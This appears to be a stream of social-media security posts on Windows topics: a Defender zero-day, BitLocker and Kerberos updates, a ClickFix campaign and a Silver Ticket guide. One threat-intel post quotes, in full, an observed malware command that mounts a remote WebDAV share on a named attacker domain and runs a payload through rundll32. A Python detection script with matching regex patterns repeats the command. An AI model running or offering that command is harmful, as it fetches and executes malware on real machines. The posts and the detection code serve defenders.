⚠️ WMIC is going away.
🖥️ WMI isn't.
🚨 Attackers still abuse native Windows tools for stealthy, fileless persistence.
👉 https://7asecurity.com/blog/2026/06/we-audited-legacy-wmic-commands-our-defensive-guide/
Windows Defender zero-day (RoguePlanet) — public PoC on GitHub, SYSTEM on fully patched Win10/11, no patch exists. Any foothold = SYSTEM. Audit app allow-listing now.
https://winbuzzer.com/2026/06/11/microsoft-fixes-windows-server-2025-bitlocker-recovery-bug-xcxwbn/
Microsoft has fixed a Windows Server 2025 BitLocker recovery bug, giving IT admins mitigation paths for affected systems at restart.
#WindowsServer2025 #BitLocker #Microsoft #WindowsServer #WindowsUpdate #MicrosoftWindows #SecurityPatches #MicrosoftSecurity #WindowsSecurity #Encryption #Enterprise
🚨 Suspicious malware delivery command observed:
conhost --headless cmd /v:on /c "call pushd \\ralgob.n1betiran.com@SSL\62b7a48e-c9dc-444f-87f7-32759cd65d16 & rundll32 goog.ct,#1"
The command hides execution, connects to a remote WebDAV share, and launches a payload via rundll32.
Observed infrastructure:
• ralgob.n1betiran.com
• *.n1betiran.com
Observed compromised website:
• ic.sch.id
Worth checking for WebDAV activity (@ssl, PROPFIND) and unusual rundll32 executions.
#Malware #CyberSecurity #ThreatIntel #DFIR #IncidentResponse #BlueTeam #WindowsSecurity #WebDAV #IOC #SOCAnalyst #tech
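One way to hunt for the pattern described in the post above, as an added example that is not part of the original post: a Python triage over process-creation command lines that flags the three traits it names (headless conhost, a WebDAV `@SSL` UNC path, rundll32 by ordinal). The event layout, host names and the two benign lines are constructed assumptions; the first command line is the one quoted in the post.

```python
import re

# Heuristics drawn from the post: hidden console host, WebDAV UNC path
# (\\host@SSL\...), and rundll32 calling an export by ordinal (,#N).
RULES = {
    "headless_conhost": re.compile(r'\bconhost(?:\.exe)?"?\s+--headless\b', re.I),
    "webdav_unc": re.compile(r'\\\\([^\\\s@]+)@(?:SSL(?:@\d+)?|\d+)\\', re.I),
    "rundll32_ordinal": re.compile(r'\brundll32(?:\.exe)?"?\s+[^,\s]+,\s*#\d+', re.I),
}

# Constructed sample events (hypothetical layout: host + command line).
EVENTS = [
    {"host": "WS-014",  # command line as quoted in the post
     "cmdline": r'conhost --headless cmd /v:on /c "call pushd '
                r'\\ralgob.n1betiran.com@SSL\62b7a48e-c9dc-444f-87f7-32759cd65d16'
                r' & rundll32 goog.ct,#1"'},
    {"host": "WS-020",  # constructed: one trait only, low confidence alone
     "cmdline": r'conhost.exe --headless powershell -File C:\Scripts\inventory.ps1'},
    {"host": "WS-031",  # constructed: ordinary rundll32 and plain SMB share
     "cmdline": r'rundll32.exe shell32.dll,Control_RunDLL \\fileserver01\share'},
]

def score_command_line(cmdline):
    """Return the sorted names of the rules that match one command line."""
    return sorted(name for name, rx in RULES.items() if rx.search(cmdline))

def webdav_hosts(cmdline):
    """Return WebDAV server names, for pivoting into proxy logs (PROPFIND)."""
    return RULES["webdav_unc"].findall(cmdline)

def triage(events, threshold=2):
    """Return (host, hits) for events matching at least `threshold` rules."""
    flagged = []
    for event in events:
        hits = score_command_line(event["cmdline"])
        if len(hits) >= threshold:
            flagged.append((event["host"], hits))
    return flagged

if __name__ == "__main__":
    for host, hits in triage(EVENTS):
        print(host, hits)
```

Requiring two or more traits keeps legitimate single-trait activity, such as an admin script started under headless conhost, out of the alert queue.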
https://winbuzzer.com/2026/06/07/microsoft-sets-june-kerberos-tests-for-ntlm-shift-xcxwbn/
Microsoft will test Kerberos paths for Windows NTLM fallback in June, giving admins a Canary preview to catch legacy app and device authentication failures.
#WindowsNTLM #Kerberos #Microsoft #MicrosoftWindows #Windows11 #WindowsServer #WindowsInsiderProgram #Cybersecurity #WindowsSecurity
🚨 Ongoing ClickFix Campaign Alert 🚨
Threat actors are using fake browser/app update prompts to trick users into running malicious PowerShell scripts (Win+R → Ctrl+V).
Block & monitor these defanged IoCs:
#ClickFix #ThreatIntel #CyberSecurity #InfoSec #Malware #IOC #DFIR #ThreatHunting #BlueTeam #SOC #CTI #DetectionEngineering #IncidentResponse #OSINT #PowerShell #WindowsSecurity
https://winbuzzer.com/2026/06/02/microsoft-backs-off-threats-against-security-researchers-xcxwbn/
Microsoft has ruled out action against security researchers after a backlash, narrowing legal risk around its wider disclosure dispute.
#SecurityResearch #Microsoft #Security #Cybersecurity #ZeroDay #MicrosoftWindows #WindowsSecurity #WindowsVulnerability #Windows11
https://winbuzzer.com/2026/06/01/github-ban-escalates-microsofts-yellowkey-dispute-xcxwbn/
GitHub appears to have banned the security researcher behind the YellowKey BitLocker exploit reveal, widening Microsoft's fight over public disclosures.
#GitHub #YellowKey #Microsoft #BitLocker #Windows11 #ZeroDay #Exploits #WindowsSecurity #Cybersecurity
What is Silver Ticket Attack: A Comprehensive Guide
In this article, I cover how Silver Ticket attacks work, common exploitation scenarios, detection techniques, and mitigation strategies.
https://denizhalil.com/2026/05/27/silver-ticket-attack-comprehensive-guide/
#CyberSecurity #ActiveDirectory #SilverTicket #Kerberos #CredentialAccess #RedTeam #BlueTeam #Pentesting #WindowsSecurity #InfoSec #ThreatDetection #DenizHalil